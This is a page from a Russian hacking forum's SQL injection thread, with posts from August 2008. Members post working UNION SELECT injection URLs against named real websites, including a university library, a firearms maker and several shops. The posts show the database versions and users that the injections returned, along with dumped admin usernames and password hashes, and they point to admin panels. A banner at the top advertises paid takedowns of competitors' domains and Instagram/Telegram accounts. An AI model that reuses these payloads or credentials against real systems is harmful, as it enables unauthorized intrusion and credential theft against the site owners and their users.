Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 639 из 1242

639

Опции темы

Поиск в этой теме

Опции просмотра

#6381

19.08.2008, 12:29

[AVT]

Новичок

Регистрация: 20.12.2007

Сообщений: 19

Провел на форуме:
373780

Репутация: 52

Супермаркет уникального контента Textsale.ru:
http://www.textsale.ru/u-1+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*.html
http://www.textsale.ru/canu-1+union+select+1,2,version(),4,5/*.html
Путь:/home/l/loveumru/public_html/textsale/public_html/
Больше ничего узнать не удается, т.к. хостер фильтрует 'from'.

#6382

19.08.2008, 14:55

Fugitif

Постоянный

Регистрация: 23.09.2007

Сообщений: 416

Провел на форуме:
1781065

Репутация: 869

Код:

http://www.nottingham.ac.uk/library/library-sites.php?id=8+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8+LIMIT+1,1/*

4.0.20-max-log:ulzljw_faqdb:ulzljw_www@portal1.is.nottingham. ac.uk

8

#6383

19.08.2008, 15:15

SVAROG

Постоянный

Регистрация: 13.02.2007

Сообщений: 406

Провел на форуме:
2706059

Репутация: 206

http://www.danwessonfirearms.com/product_detail.php?id=-48+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6/*
verion:4.0.21-standard

#6384

19.08.2008, 19:09

SVAROG

Постоянный

Регистрация: 13.02.2007

Сообщений: 406

Провел на форуме:
2706059

Репутация: 206

http://www.phpbuddy.com/article.php?id=-8+union+select+version(),2,3,4,5,6/*
version: 4.1.21-standard

#6385

19.08.2008, 19:14

iron-viper

Участник форума

Регистрация: 13.11.2007

Сообщений: 180

Провел на форуме:
1058585

Репутация: 122

http://diccionari-triat.com/rutinas.php?funcion=guardar&palabra=

Вот что-то если не то, не бейте, сам не сог расковырять, если получиться выложите, интересно глянуть

#6386

19.08.2008, 20:28

S0ulVortex

Участник форума

Регистрация: 18.11.2007

Сообщений: 184

Провел на форуме:
1686744

Репутация: 246

Отправить сообщение для S0ulVortex с помощью ICQ

Код:

http://rubin-stomatology.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,pass word,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

админка
http://rubin-stomatology.ru/administrator

#6387

19.08.2008, 23:39

kair

Участник форума

Регистрация: 12.10.2006

Сообщений: 158

Провел на форуме:
668286

Репутация: 187

Отправить сообщение для kair с помощью ICQ

Код:

http://www.toolsupplies.co.uk/product_desc.php?id=875%20union%20select%20admin_password%20from%20admin/**

#6388

20.08.2008, 01:09

Fugitif

Постоянный

Регистрация: 23.09.2007

Сообщений: 416

Провел на форуме:
1781065

Репутация: 869

Код:

http://www.krippenbauer.eu/tsnews4/news.php?tsnews4=comment&newsid=1%20UNION%20SELECT%201,2,concat_ws(0x3a,version(),database(),user()),4,5,6/*

Цитата:

4 5 schrieb am 01.01.1970, 01:00
4.0.15:krippenbauer:krippenbauer@localhost

#6389

20.08.2008, 04:25

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Отправить сообщение для Cennarios с помощью ICQ

http://www.prokit.co.uk/product.php?id=-1+union+select+1,2,concat(username,0x3a3a,password ),4,5,6,7,8+from+prokit_users/*

login:admin pass:8b36e28c44fcf9daacf25a877c530afc

_______________________________

http://www.ecitb.org.uk/administrator/index.php

http://www.ecitb.org.uk/modules/getoffice.php?office=-1+union+select+1,2,3,concat(username,0x3a3a,passwo rd),5,6,7,8,9,10,11,12,13+from+jos_users+limit+0,1 0/*

login:admin pass:cd9886f99d2337810ca3f22d5c6d9490:QFo41WOzVM1M T6YU

Последний раз редактировалось Cennarios; 20.08.2008 в 04:49..

#6390

20.08.2008, 09:03

USAkid

Участник форума

Регистрация: 17.06.2008

Сообщений: 214

Провел на форуме:
964766

Репутация: 228

Наконец-то вернулся домой, отдохнул прекрасно. Тэкс, теперь за дело:

mobilgamez.ru

Код:

http://mobilgamez.ru/ctlg.php?xn=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(version(),0x3a,user(),0x3a,database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51--

version() - 5.0.22
user() - admin_mobilgamez@89.188.106.170
database() - admin_mobilgamez

Вывод производится в title.

Сервер:
nginx/0.6.31

Админка какая-то странная, по идее тут:
http://mobilgamez.ru/admin , ввел наугад логин/пароль admin/admin ... Подойти вроде подошло, но ошибку 500 показало... Вот так вотЪ

Страница 639 из 1242

639

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход